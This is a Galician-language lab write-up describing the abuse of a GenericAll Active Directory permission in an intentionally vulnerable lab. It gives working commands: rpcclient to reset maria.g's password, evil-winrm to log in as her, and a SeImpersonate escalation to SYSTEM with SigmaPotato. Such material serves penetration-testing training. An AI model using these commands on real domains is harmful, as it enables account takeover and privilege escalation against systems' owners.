Vector de Ataque: Abuso de ACLs (HelpDesk -> Maria)
Fase: 4. Post-Explotación
Usuario de Partida: helpdesk.user (Necesítanse credenciais).
Usuario Vítima: maria.g.
Descrición:
En Active Directory, as Listas de Control de Acceso (ACLs) determinan quen pode facer que sobre un obxecto. Neste laboratorio, o grupo HelpDesk (do que helpdesk.user é membro) configurouse intencionadamente con permisos GenericAll sobre o usuario maria.g. Isto significa control total, incluíndo a capacidade de cambiar o contrasinal sen coñecer o actual.
Aviso de Viabilidade no Laboratorio
Aínda que a vulnerabilidade ACL existe, o usuario helpdesk.user non ten permisos de acceso remoto (ni WinRM nin RDP) nin un contrasinal débil. Polo tanto, nun escenario de caixa negra, é difícil explotar isto antes de ser Administrador. Este documento explica o procedemento técnico asumiendo que se obtiveron as credenciais (ex: vía extracción dende o sistema(dumping) ou enxeñaría social).
Diagrama de ataque
Procedemento Paso a Paso
1. Enumeración de Permisos (BloodHound)
A mellor forma de detectar isto é mediante BloodHound. Ao analizar o grafo, verase unha liña directa:
HelpDesk -[GenericAll]-> maria.g.
2. Explotación: Cambio de Contrasinal (Remoto)
Como non temos acceso por consola (shell) con helpdesk.user, debemos executar o cambio de contrasinal remotamente usando o protocolo RPC dende Linux.
Usando rpcclient dende Kali:
Necesitamos as credenciais de helpdesk.user (obtidas ex: tras un secretsdump global).
# Conectamos ao servizo RPC
$ rpcclient -U "VULN-HE.LAB\helpdesk.user%HelpDeskP@ss1" 192.168.56.100
# Cambiamos o contrasinal de maria.g (ID 23 é o nivel de password set)
rpcclient $> setuserinfo2 maria.g 23 'NovoPassword123!'
3. Pivotaxe e Validación
Agora que cambiamos o contrasinal de maria.g, podemos conectarnos coa súa conta. Maria si ten permisos de acceso remoto.
$ evil-winrm -i 192.168.56.100 -u maria.g -p 'NovoPassword123!'
...
*Evil-WinRM* PS C:\Users\maria.g\Documents> whoami
vuln-he\maria.g
4. Encadeamento de Ataques (Camiño a SYSTEM)
Unha vez logueados como maria.g, o ataque convértese no escenario de escalada local (ver documento ATAQUE_ESPECIFICO_SEIMPERSONATE
- Verificar privilexios:
whoami /priv(buscamos SeImpersonatePrivilege). - Subir Exploit: Subir
SigmaPotato.exe. - Executar: Cambiar contrasinal de Administrador ou obter SYSTEM.
Resumo da Cadea de Ataque:
1. Compromiso de HelpDesk (Necesario acceso inicial).
2. Abuso de ACL (GenericAll) -> Control de Maria.
3. Abuso de Privilexio (SeImpersonate) -> Control de SYSTEM.